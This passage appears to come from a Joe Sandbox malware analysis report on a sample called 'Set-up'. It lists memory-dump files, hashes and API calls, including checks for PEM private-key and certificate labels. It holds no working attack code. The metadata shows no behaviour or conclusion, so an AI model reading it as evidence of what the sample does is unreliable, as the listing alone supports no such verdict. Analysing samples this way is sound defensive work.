                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 56210b18be2d5295b2228f04e8b3613daa21c23cf66af4aab3823133a7308595
                                    • Instruction ID: f2d8b819e0ae69cd5bedf84b9b6373c4121f14221a4bb3ae5f78295705572a00
                                    • Opcode Fuzzy Hash: 56210b18be2d5295b2228f04e8b3613daa21c23cf66af4aab3823133a7308595
                                    • Instruction Fuzzy Hash: 71F1A131C18BD596E7238B2CD8427EAF3A4BFE9354F049B1DEDC872511EB3152469382
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8c15bf4492048ef30b56e1a346c55a17110d8bb22e10997e2877f6a1a6628987
                                    • Instruction ID: b1d605dbf3d6db99092bab04989d34e6c33f0b8b239caddf4862bed5aa6b07ec
                                    • Opcode Fuzzy Hash: 8c15bf4492048ef30b56e1a346c55a17110d8bb22e10997e2877f6a1a6628987
                                    • Instruction Fuzzy Hash: 48E115729087818BD7158F38C4845AAFBE0AFDA354F58CB1DE8D863252D771E984D782
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2a0acc334861111d8bba626bddb6781e38ce2f4ca6c64d97bc48ddc04adb712
                                    • Instruction ID: eb994be3beca671880f63eb5e9fa0005e697f7801bc2c19405e7405f8fd9ee8a
                                    • Opcode Fuzzy Hash: f2a0acc334861111d8bba626bddb6781e38ce2f4ca6c64d97bc48ddc04adb712
                                    • Instruction Fuzzy Hash: 6BD167F3E2054457DB0CDE38CC213A82692EB94375F5E8338FB769A3C6E238D9548684
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
                                    • Instruction ID: 7291b101d3ff11d2bdd456c24810f4d78e0c307fbc1152bc4f4867b933092b4b
                                    • Opcode Fuzzy Hash: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
                                    • Instruction Fuzzy Hash: 8BC1BB369097118BC714EF18C48026AFBE2FF84360F598A6EE8D59B351D335EC91DB82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                    • Instruction ID: da399f322d780a2ad27ed29a025d1f302b55e2d7ea89ca4a8317b39a9a998718
                                    • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                    • Instruction Fuzzy Hash: BBA19435B111598FEB38DE29CC41FDA73E2EB98310F0A8525ED599F3D1EA30AD458790
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 890c3ba1810d69907324ce26629eff9f4e84be59e47a381da580c64c3a7c32b0
                                    • Instruction ID: 3945cc262115af33da0f0e49e970bf4767e54b784286b5bf6553c8b9cb6b3f0b
                                    • Opcode Fuzzy Hash: 890c3ba1810d69907324ce26629eff9f4e84be59e47a381da580c64c3a7c32b0
                                    • Instruction Fuzzy Hash: 73A1B1316083059BE709DE6DD8D062EBBE2BBC4250F548A3DF5DA873D5D674E940CB82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterFrequency
                                    • String ID:
                                    • API String ID: 774501991-0
                                    • Opcode ID: 6a327f1c575adee8ea5b5f7a354e87dc93f99403ec0b9041a685b002c62a45dc
                                    • Instruction ID: 7238c46aeae29532e35d9cb827cb0b2caa97bfc361f9559e053fe539354eeb2f
                                    • Opcode Fuzzy Hash: 6a327f1c575adee8ea5b5f7a354e87dc93f99403ec0b9041a685b002c62a45dc
                                    • Instruction Fuzzy Hash: 71C10671915B418BD362CF38C881BEAF7E1BF99300F109A1DE9EEA6251EB707584CB51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                                    • Instruction ID: e010d27f99bdd4d6e5e9a6eb1bebec1d1cd8b6a2f7d2efa9a3424e701183441f
                                    • Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                                    • Instruction Fuzzy Hash: 5E71D0B150421A8BC7199F6CD1C0179FBE1BF88350F2A8B7DDA8987352D274EC95DB81
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                                    • Instruction ID: 279aaad3911c94cd91d53db87a612d3f07e2859c332479070315e6aa164cbfcb
                                    • Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                                    • Instruction Fuzzy Hash: CA512672B093594BD7048E5C848027FB7D1FB9A324F2A877CD6DA8B352C224DC46C7A1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                                    • Instruction ID: 1925a8494ba48c9c01ee2b4708fb092d864d7433a4df652bfca87ee5fead5bd2
                                    • Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                                    • Instruction Fuzzy Hash: BE51BFB6A086298BC7189F19C1D0529FBE2BF88310F15C67DDA9D67751C330AD64DBC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                    • Instruction ID: 77f32a645a0eb5508bb74c6a867d4602fdec3f9f5235ea52c70fc872783f286b
                                    • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                    • Instruction Fuzzy Hash: BA31B0317083198BE756ED6DC4C426EF6D29BC8360F59C63CE6C9C33C1EA719C498681
                                    APIs
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E785B6
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 00E785CC
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 00E785E2
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 00E785F8
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 00E7860A
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00E78620
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00E78634
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 00E7864A
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 00E7865C
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00E78672
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00E786A0
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00E786BA
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 00E786D0
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00E786E2
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 00E786FC
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00E78712
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 00E7872A
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00E78686
                                      • Part of subcall function 00E5CBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E37254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,00E340BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E5CBD2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strcmp$free
                                    • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
                                    • API String ID: 3401341699-4246700284
                                    • Opcode ID: 8a6ea3e682687db988f5da875fe7589ad61eec56b59e7f4c27eca1ec7ba7bc66
                                    • Instruction ID: 692f762e99897cf8e3530e4ba5a150d3917a8c1eea1cd95c95b53348ffe513bd
                                    • Opcode Fuzzy Hash: 8a6ea3e682687db988f5da875fe7589ad61eec56b59e7f4c27eca1ec7ba7bc66
                                    • Instruction Fuzzy Hash: 11B128B1A9430266E71136216D47FAB32986F7078EF08943DFE58B12C2FFA1D609C163
                                    APIs
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CF204A
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CF2068
                                    • WSAGetLastError.WS2_32 ref: 00CF20DE
                                    • recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 00CF214D
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00CF2365
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00CF238F
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CF23B9
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00CF241D
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00CF24AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
